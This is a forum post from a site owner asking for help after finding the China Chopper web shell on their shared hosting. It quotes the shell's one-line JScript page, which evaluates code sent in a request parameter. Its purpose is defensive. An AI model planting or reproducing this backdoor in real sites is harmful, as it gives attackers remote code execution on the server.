Anybody knows anything about China Chopper?

Hello everyone I have a question about this malware. I hosted my site on a shared hosting and I noticed three weird files like in this screenshot

I downloaded the file and found this line of code in one of the file:

<%@ Page Language="Jscript"%><%eval(Request.Item["45641234565"],"unsafe");%>

I went online and did some research. I found this seems to be malware called China Chopper. I talked to the hosting company. They denied it and said their server is safe. I am wondering how do fix it? Where can I start looking to fix this?
